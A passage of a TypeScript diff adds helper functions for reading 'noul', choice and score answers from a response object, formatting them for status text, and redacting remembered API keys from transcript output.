+ id: string,
362
+ ): JevAnswer | undefined {
363
+ return response.answers[id];
364
+ }
365
+
366
+ /**
367
+ * Secrets observed this process, so no notification or state string can leak an
368
+ * API key back into the session transcript. Registration happens once at load.
369
+ */
370
+ const secrets = new Set<string>();
371
+
372
+ export function rememberSecret(secret: string | undefined): void {
373
+ if (secret && secret.trim().length >= 8) secrets.add(secret.trim());
374
+ }
375
+
376
+ export function redact(text: string): string {
377
+ let out = text;
378
+ for (const secret of secrets) out = out.split(secret).join("[redacted]");
379
+ return out;
380
+ }
381
+
382
+ /** Probability that a noul answered yes, or undefined if the id is not a noul. */
383
+ export function noulValue(
384
+ response: JevResponse,
385
+ id: string,
386
+ ): number | undefined {
387
+ const answer = response.answers[id];
388
+ return answer?.type === "noul" ? answer.noul : undefined;
389
+ }
390
+
391
+ /** Noul answers carry no confidence; only choice and score do. */
392
+ export function confidenceFor(
393
+ response: JevResponse,
394
+ id: string,
395
+ ): number | undefined {
396
+ const answer = response.answers[id];
397
+ return answer && answer.type !== "noul" ? answer.confidence : undefined;
398
+ }
399
+
400
+ /** Compact single-line rendering for notify()/status text. */
401
+ export function describeAnswer(answer: JevAnswer | undefined): string {
402
+ if (!answer) return "no answer";
403
+ if (answer.type === "noul") return `yes ${answer.noul.toFixed(2)}`;
404
+ if (answer.type === "choice") {
405
+ return `${answer.choice} (conf ${answer.confidence.toFixed(2)})`;
406
+ }
407
+ const levels = Object.keys(answer.legend ?? {}).length - 1;
408
+ return `${answer.score.toFixed(2)}${levels > 0 ? `/${levels}` : ""} (conf ${answer.confidence.toFixed(2)})`;
409
+ }